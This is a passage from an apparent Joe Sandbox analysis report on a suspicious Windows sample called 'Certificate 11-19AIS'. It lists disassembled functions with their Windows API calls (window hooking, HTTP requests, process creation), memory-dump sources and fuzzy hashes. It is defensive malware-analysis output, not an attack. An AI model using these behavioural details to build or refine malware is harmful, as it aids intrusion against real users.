                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                              • String ID:
                                                                              • API String ID: 1433390588-0
                                                                              • Opcode ID: cda4f32e0967c52b9e67b05911a1d6c05283cc9641d673f25a7ddef9ed39836f
                                                                              • Instruction ID: ef1f6aef4b4966e205e3a4fc0d9f83381235bc3f0d034cbb69f5d2c8ff9e9c8d
                                                                              • Opcode Fuzzy Hash: cda4f32e0967c52b9e67b05911a1d6c05283cc9641d673f25a7ddef9ed39836f
                                                                              • Instruction Fuzzy Hash: DD31727190021AEBDB119FA0ED49EBF7BA8FF48380F004829FA16D2250E738D951DB70
                                                                              Function 007F4025 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetCurrentThreadId.KERNEL32 ref: 007F4047
                                                                              • GetForegroundWindow.USER32(00000000,?,?,?,?,?,007F30A5,?,00000001), ref: 007F405B
                                                                              • GetWindowThreadProcessId.USER32(00000000), ref: 007F4062
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007F30A5,?,00000001), ref: 007F4071
                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 007F4083
                                                                              • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,007F30A5,?,00000001), ref: 007F409C
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,007F30A5,?,00000001), ref: 007F40AE
                                                                              • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,007F30A5,?,00000001), ref: 007F40F3
                                                                              • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,007F30A5,?,00000001), ref: 007F4108
                                                                              • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,007F30A5,?,00000001), ref: 007F4113
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                              • String ID:
                                                                              • API String ID: 2156557900-0
                                                                              • Opcode ID: 3e3132c90f0c7596ea1cd89d9bf0030139f092899e261a7d61d4a9c0ded7adef
                                                                              • Instruction ID: de02a327fe5e0ad3a25df1d683ff6498cf6ce734c447dd0a2a2571ee6d57cf31
                                                                              • Opcode Fuzzy Hash: 3e3132c90f0c7596ea1cd89d9bf0030139f092899e261a7d61d4a9c0ded7adef
                                                                              • Instruction Fuzzy Hash: 0431957150020DAFEB11DF54EC4AB7A77BDBBE4311F108515FA08D6364DB78D9809B62
                                                                              Function 0082DD4A Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetSysColor.USER32(00000008), ref: 007CB496
                                                                              • SetTextColor.GDI32(?,000000FF), ref: 007CB4A0
                                                                              • SetBkMode.GDI32(?,00000001), ref: 007CB4B5
                                                                              • GetStockObject.GDI32(00000005), ref: 007CB4BD
                                                                              • GetClientRect.USER32(?), ref: 0082DD63
                                                                              • SendMessageW.USER32(?,00001328,00000000,?), ref: 0082DD7A
                                                                              • GetWindowDC.USER32(?), ref: 0082DD86
                                                                              • GetPixel.GDI32(00000000,?,?), ref: 0082DD95
                                                                              • ReleaseDC.USER32(?,00000000), ref: 0082DDA7
                                                                              • GetSysColor.USER32(00000005), ref: 0082DDC5
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                              • String ID:
                                                                              • API String ID: 3430376129-0
                                                                              • Opcode ID: 4beda6a5c43b3e46046036321bee885291095adf20a0e78b8944fbaee4268bf2
                                                                              • Instruction ID: 0ddfe0a397daaf8180bd87b23c8a059d5da25a66cc5a6f55deb2528a2cd6477a
                                                                              • Opcode Fuzzy Hash: 4beda6a5c43b3e46046036321bee885291095adf20a0e78b8944fbaee4268bf2
                                                                              • Instruction Fuzzy Hash: 4E114C31500745EFDB216BB4FC0AFA97F71FB54325F108A29FA66950E2DB324A91DB20
                                                                              Function 007ECB82 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 239COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • EnumChildWindows.USER32(?,007ECF50), ref: 007ECE90
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ChildEnumWindows
                                                                              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                              • API String ID: 3555792229-1603158881
                                                                              • Opcode ID: a0e8c201b135caf6043f508d6c517e052fd26024755a181c78cea1ae8ca99638
                                                                              • Instruction ID: 11eb89202dd68463894fa585bd459856cc004212b2529d21dd8362992cbbbb38
                                                                              • Opcode Fuzzy Hash: a0e8c201b135caf6043f508d6c517e052fd26024755a181c78cea1ae8ca99638
                                                                              • Instruction Fuzzy Hash: 5291F434601686EACB1ADFA1C486BEAFB74FF08300F508559D949E7141DF38A95BCBE0
                                                                              Function 007B3093 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 007B30DC
                                                                              • CoUninitialize.OLE32(?,00000000), ref: 007B3181
                                                                              • UnregisterHotKey.USER32(?), ref: 007B32A9
                                                                              • DestroyWindow.USER32(?), ref: 00825079
                                                                              • FreeLibrary.KERNEL32(?), ref: 008250F8
                                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00825125
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                              • String ID: close all
                                                                              • API String ID: 469580280-3243417748
                                                                              • Opcode ID: c45604314b6c8a02c27713a9ea9a36c3afb8049296f01021a4a8b4d2b444f32a
                                                                              • Instruction ID: 87def0291e950b560ce7bcf22d86a3199aa1b8b0dca850e28ab3a73e6ac2c0c0
                                                                              • Opcode Fuzzy Hash: c45604314b6c8a02c27713a9ea9a36c3afb8049296f01021a4a8b4d2b444f32a
                                                                              • Instruction Fuzzy Hash: 47912A70600616CFC715EF14D899FA9F3A4FF14304F5482A9E50AA7262DF38AEA6CF50
                                                                              Function 007CCB8D Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetWindowLongW.USER32(?,000000EB), ref: 007CCC15
                                                                                • Part of subcall function 007CCCCD: GetClientRect.USER32(?,?), ref: 007CCCF6
                                                                                • Part of subcall function 007CCCCD: GetWindowRect.USER32(?,?), ref: 007CCD37
                                                                                • Part of subcall function 007CCCCD: ScreenToClient.USER32(?,?), ref: 007CCD5F
                                                                              • GetDC.USER32 ref: 0082D137
                                                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0082D14A
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 0082D158
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 0082D16D
                                                                              • ReleaseDC.USER32(?,00000000), ref: 0082D175
                                                                              • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0082D200
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                              • String ID: U
                                                                              • API String ID: 4009187628-3372436214
                                                                              • Opcode ID: c134881b43e5c11d6f66b80d8af07c1327598c841e06f94b58ab1c9a1dab2e38
                                                                              • Instruction ID: 12b2d43e92865eb6e9e01bbfce48e98c0e5f8cd9b2cb229c21231a8f902a9d87
                                                                              • Opcode Fuzzy Hash: c134881b43e5c11d6f66b80d8af07c1327598c841e06f94b58ab1c9a1dab2e38
                                                                              • Instruction Fuzzy Hash: 9571DE30400308DFCF229F64E885AAA7FB5FF58314F14466EED599A2A6D7348C91DB60
                                                                              Function 0081ECD4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 007CB34E: GetWindowLongW.USER32(?,000000EB), ref: 007CB35F
                                                                                • Part of subcall function 007CB63C: GetCursorPos.USER32(000000FF), ref: 007CB64F
                                                                                • Part of subcall function 007CB63C: ScreenToClient.USER32(00000000,000000FF), ref: 007CB66C
                                                                                • Part of subcall function 007CB63C: GetAsyncKeyState.USER32(00000001), ref: 007CB691
                                                                                • Part of subcall function 007CB63C: GetAsyncKeyState.USER32(00000002), ref: 007CB69F
                                                                              • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 0081ED3C
                                                                              • ImageList_EndDrag.COMCTL32 ref: 0081ED42
                                                                              • ReleaseCapture.USER32 ref: 0081ED48
                                                                              • SetWindowTextW.USER32(?,00000000), ref: 0081EDF0
                                                                              • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0081EE03
                                                                              • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 0081EEDC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                              • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                              • API String ID: 1924731296-2107944366
                                                                              • Opcode ID: 763014fc136f633e72b77fc8c7f6c8972b1df7e4bdfe3d6b7555af2b0ff71119
                                                                              • Instruction ID: 8f1f0f0461ae909a563ca7ab30246ed3acd2a1252c5b7744595b001f27f5e535
                                                                              • Opcode Fuzzy Hash: 763014fc136f633e72b77fc8c7f6c8972b1df7e4bdfe3d6b7555af2b0ff71119
                                                                              • Instruction Fuzzy Hash: 54517870208304AFDB14DF24DC9AFAA77E8FF98704F00491DF995962A2DB749994CB52
                                                                              Function 008045C4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 008045FF
                                                                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0080462B
                                                                              • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0080466D
                                                                              • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00804682
                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0080468F
                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 008046BF
                                                                              • InternetCloseHandle.WININET(00000000), ref: 00804706
                                                                                • Part of subcall function 00805052: GetLastError.KERNEL32(?,?,008043CC,00000000,00000000,00000001), ref: 00805067
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                              • String ID:
                                                                              • API String ID: 1241431887-3916222277
                                                                              • Opcode ID: 8ef1af429deb7726e95c27c1b6cff89c1bc4761a2d4455643f579730aabe9e16
                                                                              • Instruction ID: 17948e81beb49c293398df648cc3e4720b14e3f23b748b7c92a1c31e63ba6e6a
                                                                              • Opcode Fuzzy Hash: 8ef1af429deb7726e95c27c1b6cff89c1bc4761a2d4455643f579730aabe9e16
                                                                              • Instruction Fuzzy Hash: DD419DB1541208BFEB129FA4DC89FBB77ACFF09304F00511AFA15DA181EBB19D448BA4
                                                                              Function 0080B644 Relevance: 13.9, APIs: 9, Instructions: 432COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0084DC00), ref: 0080B715
                                                                              • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0084DC00), ref: 0080B749
                                                                              • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0080B8C1
                                                                              • SysFreeString.OLEAUT32(?), ref: 0080B8EB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                              • String ID:
                                                                              • API String ID: 560350794-0
                                                                              • Opcode ID: f1a33ba2d4e0f9c65a4d5f96b850cb14558b61a498e5bc984d929ecde4817ef8
                                                                              • Instruction ID: 76b2c1cffa17ef0d9913b5a5de2c523c7592d7e3f3f543d5bf214e35ca203f38
                                                                              • Opcode Fuzzy Hash: f1a33ba2d4e0f9c65a4d5f96b850cb14558b61a498e5bc984d929ecde4817ef8
                                                                              • Instruction Fuzzy Hash: A0F11775A00219EFCB44DF94CC88EAEB7B9FF89315F108459F915AB290DB31AE41CB50
                                                                              Function 008124D4 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 008124F5
                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00812688
                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 008126AC
                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 008126EC
                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0081270E
                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0081286F
                                                                              • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 008128A1
                                                                              • CloseHandle.KERNEL32(?), ref: 008128D0
                                                                              • CloseHandle.KERNEL32(?), ref: 00812947
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                              • String ID:
                                                                              • API String ID: 4090791747-0
                                                                              • Opcode ID: 35ed17a781a99fe8e75576d77377d94640cad739db83d39b654df4562cfe62d6
                                                                              • Instruction ID: ecf7151835122fd0583e8d306fe5341cc635dcf80ed0ffbe95e561971518b019
                                                                              • Opcode Fuzzy Hash: 35ed17a781a99fe8e75576d77377d94640cad739db83d39b654df4562cfe62d6
                                                                              • Instruction Fuzzy Hash: BBD18D31604240DFCB15EF24C495BAABBE9FF84314F14885DF9999B2A2DB35DC90CB52
                                                                              Function 0081B33A Relevance: 13.7, APIs: 9, Instructions: 167COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0081B3F4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: InvalidateRect
                                                                              • String ID:
                                                                              • API String ID: 634782764-0
                                                                              • Opcode ID: c1fcefb7f3d0a60063e31346eacbea799fad2b0fa8b733a98fe3f0d7c1bad814
                                                                              • Instruction ID: 4e749457ad13031835694b4ad167b4ae513f1665b44e4277da5efd1b589659ae
                                                                              • Opcode Fuzzy Hash: c1fcefb7f3d0a60063e31346eacbea799fad2b0fa8b733a98fe3f0d7c1bad814
                                                                              • Instruction Fuzzy Hash: 34517F30500208BAEF209F689C89BE97BADFF05318F644515F625D62E2D771E9D08A55
                                                                              Function 007CA699 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0082DB1B
                                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0082DB3C
                                                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0082DB51
                                                                              • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0082DB6E
                                                                              • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0082DB95
                                                                              • DestroyIcon.USER32(00000000,?,?,?,?,?,?,007CA67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0082DBA0
                                                                              • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0082DBBD
                                                                              • DestroyIcon.USER32(00000000,?,?,?,?,?,?,007CA67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0082DBC8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                              • String ID:
                                                                              • API String ID: 1268354404-0
                                                                              • Opcode ID: f6acbcb8eb62e356736c9872d329406a2f66fcee6508fbc008d355ac909f7682
                                                                              • Instruction ID: 164e2c650c11d232370b3ab89ea2b12808d9f312d37dded6c60fde85e4b754b9
                                                                              • Opcode Fuzzy Hash: f6acbcb8eb62e356736c9872d329406a2f66fcee6508fbc008d355ac909f7682
                                                                              • Instruction Fuzzy Hash: 5B514470600308EFDB209F68DC96FAA7BB8FB58764F10051CF946E6690D7B4A880DB50
                                                                              Function 007F7555 Relevance: 13.6, APIs: 9, Instructions: 142filestringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 007F6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,007F5FA6,?), ref: 007F6ED8
                                                                                • Part of subcall function 007F6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,007F5FA6,?), ref: 007F6EF1
                                                                                • Part of subcall function 007F72CB: GetFileAttributesW.KERNEL32(?,007F6019), ref: 007F72CC
                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 007F75CA
                                                                              • _wcscmp.LIBCMT ref: 007F75E2
                                                                              • MoveFileW.KERNEL32(?,?), ref: 007F75FB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                              • String ID:
                                                                              • API String ID: 793581249-0
                                                                              • Opcode ID: 7f8e0594eb7d746545d4180dc6df87d963cf693b7f2d5d3548a422601a50c6ef
                                                                              • Instruction ID: cadc688e426bf28690ab39bc940387feb1707b67a186e16fff9c5bda2d26067b
                                                                              • Opcode Fuzzy Hash: 7f8e0594eb7d746545d4180dc6df87d963cf693b7f2d5d3548a422601a50c6ef
                                                                              • Instruction Fuzzy Hash: 0D5124B290921D9EDF54EB94D845DED73BCAF48310F00459AF605E3241EA7897C5CB70
                                                                              Function 007CEA69 Relevance: 13.6, APIs: 9, Instructions: 135COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0082DAD1,00000004,00000000,00000000), ref: 007CEAEB
                                                                              • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0082DAD1,00000004,00000000,00000000), ref: 007CEB32
                                                                              • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0082DAD1,00000004,00000000,00000000), ref: 0082DC86
                                                                              • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0082DAD1,00000004,00000000,00000000), ref: 0082DCF2
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ShowWindow
                                                                              • String ID:
